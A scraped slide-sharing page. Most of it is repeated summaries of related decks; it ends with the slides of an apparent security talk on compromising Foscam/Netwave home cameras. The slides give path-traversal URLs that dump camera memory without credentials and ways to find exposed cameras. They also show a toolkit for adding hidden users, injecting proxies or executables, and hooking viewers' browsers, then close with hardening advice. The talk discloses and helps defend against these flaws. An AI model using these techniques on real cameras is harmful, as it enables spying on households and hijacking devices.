The document discusses a home surveillance camera system. It describes the hardware components of the camera, including that it runs a customized version of Linux. It also explains the software components, such as the system firmware, web user interface (UI), and settings section that stores the camera configuration. The camera accesses the web UI through a CGI interface and can be controlled remotely through a web browser.
The document provides an overview of an animation workshop. It discusses the history of animation and different animation techniques that were demonstrated such as stop-motion, claymation, and computer generated animation. Examples of famous animators and their works are shown. The document encourages experimentation and collaboration among students to develop their animation ideas and skills. It suggests building on concepts over multiple years and viewing animation as an ongoing learning process.
This document is the contents page for the "Ubuntu Pocket Guide and Reference" book. It lists the chapters and sections that will be covered in the book, including installing Ubuntu, configuring Ubuntu, and getting to grips with the Ubuntu desktop. The book is distributed both as a printed edition and as a PDF file, and permissions and copyright information for each format are provided. It also includes information about the author and a brief introduction to Ubuntu.
Tweaking to get away from Application Layer DoS attacksSergey Shekyan
The document discusses denial of service (DoS) attacks, specifically the Slowloris and Slow POST attacks. Slowloris keeps HTTP connections open by sending partial or incomplete headers in requests, while Slow POST sends complete headers but sends the message body in incomplete chunks to keep connections open. Both attacks aim to exhaust the pool of available connections on a server. The document also provides details on how these attacks work and examples of the request syntax used to execute the attacks.
WebSockets allow for two-way communication between a client and server using a single connection. They provide a more efficient alternative to previous solutions like long-polling that required separate connections. While WebSockets improve performance, they also introduce some security concerns due to their ability to establish persistent connections that bypass some cross-origin protections. Attackers could potentially abuse WebSockets to conduct denial of service attacks or inject malicious content into connections. Web developers need to ensure proper security practices like using TLS to prevent issues with mixed content or connection interception.
Etude de cas de securite wifi vpn ssl camera ip video surveillance 2014PRONETIS
Étude de cas sécurité pour des élèves ingénieurs en génie industriel. L'objectif est de définir et d'appliquer une politique de sécurité opérationnelle sur la base de produits de sécurité standard.
The document provides an overview of an animation workshop. It discusses the history of animation and different animation techniques that were demonstrated such as stop-motion, claymation, and computer generated animation. Examples of famous animators and their works are shown. The document encourages experimentation and collaboration among students to develop their animation ideas and skills. It suggests building on concepts over multiple years and viewing animation as an ongoing learning process.
This document is the contents page for the "Ubuntu Pocket Guide and Reference" book. It lists the chapters and sections that will be covered in the book, including installing Ubuntu, configuring Ubuntu, and getting to grips with the Ubuntu desktop. The book is distributed both as a printed edition and as a PDF file, and permissions and copyright information for each format are provided. It also includes information about the author and a brief introduction to Ubuntu.
Tweaking to get away from Application Layer DoS attacksSergey Shekyan
The document discusses denial of service (DoS) attacks, specifically the Slowloris and Slow POST attacks. Slowloris keeps HTTP connections open by sending partial or incomplete headers in requests, while Slow POST sends complete headers but sends the message body in incomplete chunks to keep connections open. Both attacks aim to exhaust the pool of available connections on a server. The document also provides details on how these attacks work and examples of the request syntax used to execute the attacks.
WebSockets allow for two-way communication between a client and server using a single connection. They provide a more efficient alternative to previous solutions like long-polling that required separate connections. While WebSockets improve performance, they also introduce some security concerns due to their ability to establish persistent connections that bypass some cross-origin protections. Attackers could potentially abuse WebSockets to conduct denial of service attacks or inject malicious content into connections. Web developers need to ensure proper security practices like using TLS to prevent issues with mixed content or connection interception.
Etude de cas de securite wifi vpn ssl camera ip video surveillance 2014PRONETIS
Étude de cas sécurité pour des élèves ingénieurs en génie industriel. L'objectif est de définir et d'appliquer une politique de sécurité opérationnelle sur la base de produits de sécurité standard.
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'Positive Hack Days
This document discusses vulnerabilities in internet-connected surveillance cameras. It describes how authentication bypass vulnerabilities can allow unauthenticated access to camera memory dumps, exposing credentials and private information. It also outlines how cross-site request forgery attacks can be used to add unauthorized admin accounts. Once access is obtained, the document notes attackers can stream live video, obtain network credentials, install malware or use the device to attack other systems on the local network or internet.
Attacking the macOS Kernel Graphics DriverPriyanka Aash
"Just like the Windows platform, graphic drivers of macOS kernel are complicated and provide a large promising attack surface for EoPs and sandbox escapes from low-privileged processes. After auditing part of the binaries, I discovered a number of vulnerabilities last year. Including, NULL pointer dereference, stack-based buffer overflow, arbitrary kernel memory read and write, use-after-free, etc. Some of these vulnerabilities were reported to Apple Inc., such as the CVE-2017-7155, CVE-2017-7163, CVE-2017-13883.
In this presentation, I will share with you the detailed information about these vulnerabilities. Furthermore, from the attacker's perspective, I will also reveal some new exploit techniques and zero-days."
(120513) #fitalk an introduction to linux memory forensicsINSIGHT FORENSIC
This document discusses Linux memory forensics and provides an overview of tools and techniques for acquiring and analyzing memory. It begins by covering live forensics commands and then discusses memory forensics in more depth. Several open source tools for dumping physical memory are described, including fmem and LiME, as well as tools for analyzing memory images like Foriana and Volatilitux. Commercial memory analysis solutions are also briefly mentioned.
(120513) #fitalk an introduction to linux memory forensicsINSIGHT FORENSIC
This document discusses Linux memory forensics and provides an overview of tools and techniques for acquiring and analyzing memory images. It begins with an introduction to live forensics and lists common Linux commands for gathering system information. The document then covers memory forensics, describing how to access physical memory and dump it to a disk image using tools like fmem and LiME. It also introduces tools for parsing memory dumps, such as Foriana and Volatilitux, and discusses commercial forensic solutions.
While probably the most prominent, Docker is not the only tool for building and managing containers. Originally meant to be a "chroot on steroids" to help debug systemd, systemd-nspawn provides a fairly uncomplicated approach to work with containers. Being part of systemd, it is available on most recent distributions out-of-the-box and requires no additional dependencies.
This deck will introduce a few concepts involved in containers and will guide you through the steps of building a container from scratch. The payload will be a simple service, which will be automatically activated by systemd when the first request arrives.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration, networking, security, and development tasks. It includes sections on system information, processes, file systems, networking, remote access, backups, permissions, encryption, version control, software installation, printing, databases, shells, scripting, and programming. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration, networking, security, and development tasks. It includes sections on system information, processes, file systems, networking, remote access, backups, permissions, encryption, version control, software installation, printing, databases, shells, scripting, and programming. The reader is assumed to have advanced Unix knowledge to use the concise explanations provided.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is assumed.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is expected.
This document provides a collection of Unix/Linux commands for system administration, networking, security, and development tasks. It includes over 20 sections that cover topics such as the system, processes, file system, networking, encryption, version control, software installation, scripting, and programming. The reader is assumed to have advanced Unix knowledge to utilize the concise explanations provided.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is assumed.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is expected.
24may 1000 valday sergey shekyan artem harutyunyan 'to watch or to be watched'Positive Hack Days
This document discusses vulnerabilities in internet-connected surveillance cameras. It describes how authentication bypass vulnerabilities can allow unauthenticated access to camera memory dumps, exposing credentials and private information. It also outlines how cross-site request forgery attacks can be used to add unauthorized admin accounts. Once access is obtained, the document notes attackers can stream live video, obtain network credentials, install malware or use the device to attack other systems on the local network or internet.
Attacking the macOS Kernel Graphics DriverPriyanka Aash
"Just like the Windows platform, graphic drivers of macOS kernel are complicated and provide a large promising attack surface for EoPs and sandbox escapes from low-privileged processes. After auditing part of the binaries, I discovered a number of vulnerabilities last year. Including, NULL pointer dereference, stack-based buffer overflow, arbitrary kernel memory read and write, use-after-free, etc. Some of these vulnerabilities were reported to Apple Inc., such as the CVE-2017-7155, CVE-2017-7163, CVE-2017-13883.
In this presentation, I will share with you the detailed information about these vulnerabilities. Furthermore, from the attacker's perspective, I will also reveal some new exploit techniques and zero-days."
(120513) #fitalk an introduction to linux memory forensicsINSIGHT FORENSIC
This document discusses Linux memory forensics and provides an overview of tools and techniques for acquiring and analyzing memory. It begins by covering live forensics commands and then discusses memory forensics in more depth. Several open source tools for dumping physical memory are described, including fmem and LiME, as well as tools for analyzing memory images like Foriana and Volatilitux. Commercial memory analysis solutions are also briefly mentioned.
(120513) #fitalk an introduction to linux memory forensicsINSIGHT FORENSIC
This document discusses Linux memory forensics and provides an overview of tools and techniques for acquiring and analyzing memory images. It begins with an introduction to live forensics and lists common Linux commands for gathering system information. The document then covers memory forensics, describing how to access physical memory and dump it to a disk image using tools like fmem and LiME. It also introduces tools for parsing memory dumps, such as Foriana and Volatilitux, and discusses commercial forensic solutions.
While probably the most prominent, Docker is not the only tool for building and managing containers. Originally meant to be a "chroot on steroids" to help debug systemd, systemd-nspawn provides a fairly uncomplicated approach to work with containers. Being part of systemd, it is available on most recent distributions out-of-the-box and requires no additional dependencies.
This deck will introduce a few concepts involved in containers and will guide you through the steps of building a container from scratch. The payload will be a simple service, which will be automatically activated by systemd when the first request arrives.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration, networking, security, and development tasks. It includes sections on system information, processes, file systems, networking, remote access, backups, permissions, encryption, version control, software installation, printing, databases, shells, scripting, and programming. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration, networking, security, and development tasks. It includes sections on system information, processes, file systems, networking, remote access, backups, permissions, encryption, version control, software installation, printing, databases, shells, scripting, and programming. The reader is assumed to have advanced Unix knowledge to use the concise explanations provided.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is assumed.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is expected.
This document provides a collection of Unix/Linux commands for system administration, networking, security, and development tasks. It includes over 20 sections that cover topics such as the system, processes, file system, networking, encryption, version control, software installation, scripting, and programming. The reader is assumed to have advanced Unix knowledge to utilize the concise explanations provided.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is assumed.
This document provides a collection of Unix/Linux commands useful for system administration and advanced users. It covers topics such as system information, processes, file systems, networks, encryption, version control, software installation and more. Each section provides concise explanations of commands within that topic area. The reader is expected to have a working knowledge of Unix-like systems.
This document provides a collection of Unix/Linux commands for system administration tasks. It covers topics such as the system, processes, file system, network, encryption, version control, software installation and more. Each section provides concise explanations of relevant commands and many include page references for further details. Advanced knowledge of the operating system is expected.
Similar to Turning your surveillance camera against you (20)
Level 3 NCEA - NZ: A Nation In the Making 1872 - 1900 SML.pptHenry Hollis
The History of NZ 1870-1900.
Making of a Nation.
From the NZ Wars to Liberals,
Richard Seddon, George Grey,
Social Laboratory, New Zealand,
Confiscations, Kotahitanga, Kingitanga, Parliament, Suffrage, Repudiation, Economic Change, Agriculture, Gold Mining, Timber, Flax, Sheep, Dairying,
A Visual Guide to 1 Samuel | A Tale of Two HeartsSteve Thomason
These slides walk through the story of 1 Samuel. Samuel is the last judge of Israel. The people reject God and want a king. Saul is anointed as the first king, but he is not a good king. David, the shepherd boy is anointed and Saul is envious of him. David shows honor while Saul continues to self destruct.
Chapter wise All Notes of First year Basic Civil Engineering.pptxDenish Jangid
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to objective, scope and outcome the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instrument used Object of levelling, Methods of levelling in brief, and Contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. . Noise Pollution Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
Gender and Mental Health - Counselling and Family Therapy Applications and In...PsychoTech Services
A proprietary approach developed by bringing together the best of learning theories from Psychology, design principles from the world of visualization, and pedagogical methods from over a decade of training experience, that enables you to: Learn better, faster!
THE SACRIFICE HOW PRO-PALESTINE PROTESTS STUDENTS ARE SACRIFICING TO CHANGE T...indexPub
The recent surge in pro-Palestine student activism has prompted significant responses from universities, ranging from negotiations and divestment commitments to increased transparency about investments in companies supporting the war on Gaza. This activism has led to the cessation of student encampments but also highlighted the substantial sacrifices made by students, including academic disruptions and personal risks. The primary drivers of these protests are poor university administration, lack of transparency, and inadequate communication between officials and students. This study examines the profound emotional, psychological, and professional impacts on students engaged in pro-Palestine protests, focusing on Generation Z's (Gen-Z) activism dynamics. This paper explores the significant sacrifices made by these students and even the professors supporting the pro-Palestine movement, with a focus on recent global movements. Through an in-depth analysis of printed and electronic media, the study examines the impacts of these sacrifices on the academic and personal lives of those involved. The paper highlights examples from various universities, demonstrating student activism's long-term and short-term effects, including disciplinary actions, social backlash, and career implications. The researchers also explore the broader implications of student sacrifices. The findings reveal that these sacrifices are driven by a profound commitment to justice and human rights, and are influenced by the increasing availability of information, peer interactions, and personal convictions. The study also discusses the broader implications of this activism, comparing it to historical precedents and assessing its potential to influence policy and public opinion. The emotional and psychological toll on student activists is significant, but their sense of purpose and community support mitigates some of these challenges. However, the researchers call for acknowledging the broader Impact of these sacrifices on the future global movement of FreePalestine.
Philippine Edukasyong Pantahanan at Pangkabuhayan (EPP) CurriculumMJDuyan
(𝐓𝐋𝐄 𝟏𝟎𝟎) (𝐋𝐞𝐬𝐬𝐨𝐧 𝟏)-𝐏𝐫𝐞𝐥𝐢𝐦𝐬
𝐃𝐢𝐬𝐜𝐮𝐬𝐬 𝐭𝐡𝐞 𝐄𝐏𝐏 𝐂𝐮𝐫𝐫𝐢𝐜𝐮𝐥𝐮𝐦 𝐢𝐧 𝐭𝐡𝐞 𝐏𝐡𝐢𝐥𝐢𝐩𝐩𝐢𝐧𝐞𝐬:
- Understand the goals and objectives of the Edukasyong Pantahanan at Pangkabuhayan (EPP) curriculum, recognizing its importance in fostering practical life skills and values among students. Students will also be able to identify the key components and subjects covered, such as agriculture, home economics, industrial arts, and information and communication technology.
𝐄𝐱𝐩𝐥𝐚𝐢𝐧 𝐭𝐡𝐞 𝐍𝐚𝐭𝐮𝐫𝐞 𝐚𝐧𝐝 𝐒𝐜𝐨𝐩𝐞 𝐨𝐟 𝐚𝐧 𝐄𝐧𝐭𝐫𝐞𝐩𝐫𝐞𝐧𝐞𝐮𝐫:
-Define entrepreneurship, distinguishing it from general business activities by emphasizing its focus on innovation, risk-taking, and value creation. Students will describe the characteristics and traits of successful entrepreneurs, including their roles and responsibilities, and discuss the broader economic and social impacts of entrepreneurial activities on both local and global scales.
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptxEduSkills OECD
Iván Bornacelly, Policy Analyst at the OECD Centre for Skills, OECD, presents at the webinar 'Tackling job market gaps with a skills-first approach' on 12 June 2024
3. What can it do?
“Enjoy the convenience and peace of mind knowing that your loved ones and personal
belongings are safe and out of harm's way. Stream live video and
audio directly to your PC (Windows & Mac), Smartphone (Iphone/
Android/Blackberry) or Tablet PC (Ipad/Android/Windows 8).”
“Get instant notifications via email/ftp whenever motion is detected. Record
snapshots when anyone enters or exits your driveway, backyard, home or business.”
“Foscam is designed to work right of the box - simply connect
the camera
to your wireless network, setup port-forwarding
and away you go. Once properly configured, the camera operates independently without
the need for any computer.”
Text from product description on amazon.com
3
Thursday, April 11, 13
4. Camera (Foscam FI8910W)
Camera is built on Winbond
W90N745 board (32bit
ARM7TDMI)
Runs uClinux (based on 2.4
Linux kernel)
Board Support Package is Image from http://www.computersolutions.cn/blog/
available from the board
vendor
4
Thursday, April 11, 13
7. System firmware
Custom binary file to store compressed
kernel and ROMFS image, ~ 1.8Mb
header: magic, size of linux.bin, size of
romfs.img
linux.bin and romfs.img
romfs.img contains ‘camera’ binary and
uClinux boot scripts
7
Thursday, April 11, 13
8. linux.bin
00000000 50 4b 03 04 14 00 02 00 08 00 9c 40 62 40 52 be |PK.........@b@R.|
00000010 e3 97 6b df 0a 00 5c b7 15 00 09 00 00 00 6c 69 |..k..........li|
00000020 6e 75 78 2e 62 69 6e ec fd 0d 7c 54 c5 b9 07 8e |nux.bin...|T....|
PK003004 Zip magic number
00000030 cf d9 dd 24 4b 58 e1 24 9b 40 84 58 0e 10 6d c4 |...$KX.$.@.X..m.|
00000040 a8 07 88 36 6a 94 45 d0 52 a1 ba bc 29 b5 b4 8d |...6j.E.R...)...|
00000050 8a 96 de 62 8d 96 b6 dc 5e ac 9b 64 13 90 06 0c |...b....^..d....|
00000060 10 5e c4 68 b6 4a 7b d1 8b b7 b4 c5 96 6b 69 ef |.^.h.J{......ki.|
00000070 0a 68 a9 45 4b 15 5b 6b 69 3d bb 9b d3 84 2c 6d |.h.EK.[ki=....,m|
00000080 d3 96 f6 72 2d 75 7f df ef cc 6c 76 13 b1 2f f7 |...r-u....lv../.|
00000090 de df ef f3 ff 7c fe cd 87 61 f6 cc 99 33 af cf |.....|...a...3..|
000000a0 3c 6f f3 cc 33 22 1e 4b 3c 63 c6 52 af 8a 58 4a |<o..3".K<c.R..XJ|
8
Thursday, April 11, 13
11. WebUI
http://admin:pass@camera/
User
Agent =
http://camera/videostream.cgi?
CGI
=
GET /live.htm HTTP/1.1
Authorization: Basic YWRtaW46cGFzcw==
Web +
<img src = “videostream.cgi”>
11
Thursday, April 11, 13
12. WebUI Firmware
Custom binary file format to store static
content to be served by embedded web
server, ~100Kb
header: magic, checksum, file size,
version)
for each file: lengh of file name, file name,
type (dir|file), length of file, file
12
Thursday, April 11, 13
14. Settings section
Fixed size 5Kb data structure to store
camera configuration
header: magic, checksum, camera id,
system firmware version, webUI version,
camera alias
user/password, network settings, wifi, e-
mail, ftp, MSN credentials
14
Thursday, April 11, 13
17. Auth bypass/privilege
escalation
CVE-2013-2560 by Arnaud Calmejane and
Frederic Basse – allows to dump the entire
memory, with no credentials
http://cameraurl//proc/kcore
http://cameraurl//../proc/kcore
http://cameraurl/spanish/../../proc/kcore
http://operator_usr:operator_pwd@camera/
decoder_control.cgi?command=1&next_url=/proc/kcore
17
Thursday, April 11, 13
21. Getting a camera ...
... In the wild
~2 out of 10 cameras brought by Shodan (www.shodanhq.com) will
authenticate you with ‘admin’ without password
The vast majority of cameras have firmware vulnerable to path traversal
vulnerability that allows authentication bypass
Login bruteforce of server basic authentication (so 90s, but THC Hydra
does a great job)
... Targeted
Targeted CSRF attacks will always work until they redesign authentication
Clickjacking
21
Thursday, April 11, 13
23. What can you do?
Grab videostream, email, ftp, MSN, wifi credentials
It’s a Linux box on the Internet
Run arbitrary software (think botnet, proxies,
scanners)
Host malware
It’s a Linux box on the intranet too!
Attack victim’s browser (think BeEF)
23
Thursday, April 11, 13
24. Cameras in the wild
Services Top Countries
HTTP 83,894 United States 16,293
HTTP Alternate 16,565 Germany 15,898
Oracle iSQL Plus 408 France 13,289
Synology 358 Top Cities
Oracle iSQL Plus 90 Central District 2,230
Beijing 1,242
Source: www.shodanhq.com Paris 891
(search for ‘Netwave IP Camera’)
24
Thursday, April 11, 13
25. DDNS can help too
Camera vendors provide DDNS service
Foscam - XX####.myfoscam.org (e.g. aa1234.myfoscam.org)
EasyN - XXXX.ipcam.hk (e.g. aaaa.ipcam.hk)
Apexis - X####.aipcam.com (e.g. a1234.aipcam.com)
Wansview - ###XXXX.nwsvr1.com (e.g. a123aaaa.nwsvr1.com)
Insteon - X#####. nwsvr1.com (e.g. a12345.myipcamera.com)
*.myfoscam.org
~141000 valid IPs
~41000 responded to ping
~7200 had a web server running on port 80
~2600 responded with ‘Server: Netwave IP Camera’
25
Thursday, April 11, 13
26. DEMO
Create a backdoor
Add a hidden user to the camera
Add hook to victim’s browser
Host a proxy on the camera (inject new code)
26
Thursday, April 11, 13
27. Altering Camera Web UI:
adding a hook to victim’s browser
Figure out version of the Web UI (CGI API)
Find the Web UI of the same version (internets)
Unpack (uiextract)
Add new code (patch)
Pack everything back (uipack)
Verify (uiextract)
Push back to the camera (CGI API)
Cleanup the log (CGI API)
github.com/artemharutyunyan/getmecamtool
27
Thursday, April 11, 13
28. Altering the camera firmware:
silently slipping a new code
Figure out version of the firmware (CGI API)
Find the firmware of the same version (internets)
Unpack the firmware (sysextract)
Add new code (prepare and cross-compile)
Pack everything back (mount, cp, genromfs, syspack)
Verify (sysextract)
Push back to the camera (CGI API)
Cleanup the log (CGI API)
github.com/artemharutyunyan/getmecamtool
28
Thursday, April 11, 13
29. Usecase: a proxy
CONNECT: www.google.com:443
GET / HTTP/1.1 ...
Host: ar1234.myfoscam.org GET / HTTP/1.1
NAT
port 80
if(knows_im_a_proxy) Internets
tunnel_the_connection();
else
connect_to_the_camera();
29
Thursday, April 11, 13
30. Demo doing all of the above
with a single command
$ ./getmecamtool -h
A script for demonstrating the work of camtool utilities
Usage: ./getmecamtool -c <cmd> [OPTIONS]
OPTIONS:
-c <cmd> command (availble commands are inject_exec inject_proxy
poison_webui)
-a <addr> address of the camera
-u <username> username for accessing the camera
-p <password> password for accessing the camera
-e <exec> path to executable file for injecting to the camera
-k <args> arguments with which the executable has to run
-s <path> path to system firmware library folder
-i <inject username> username to create on the camera
-l <inject password> password for the new username
-w <webui patch> absolute path to the Web UI patch file
-o <new port> new port the camera firmware should listen on
-h display this message
$
github.com/artemharutyunyan/getmecamtool
30
Thursday, April 11, 13
31. DoS
Accepts ~80 concurrent
HTTP connections
Takes seconds to get DoS
Camera logs authenticated
requests, so no traces on
the camera
Use slowhttptest to
simualte Application Layer
DoS attacks!
31
Thursday, April 11, 13
32. Making it (less in)secure
Ideally, do not expose the camera to oustide network.
However, if you absolutely have to, then ...
Use firewall/IPS with strict rules
Define authorized IPs (fail2ban)
Protect against bruteforce (throttle down connection
rate)
Use reverse proxy
HTTPS transport
Override response headers
Isolate the camera from the internal network
32
Thursday, April 11, 13
33. Summary for
Hackers
You just learned something
... and got a toolkit for trying things out
Admins
Slowly start watching for traffic coming from
“Netwave IP Camera”
Users
Be careful exposing it
33
Thursday, April 11, 13
34. Q&A
@sshekyan
@hartem
34
Thursday, April 11, 13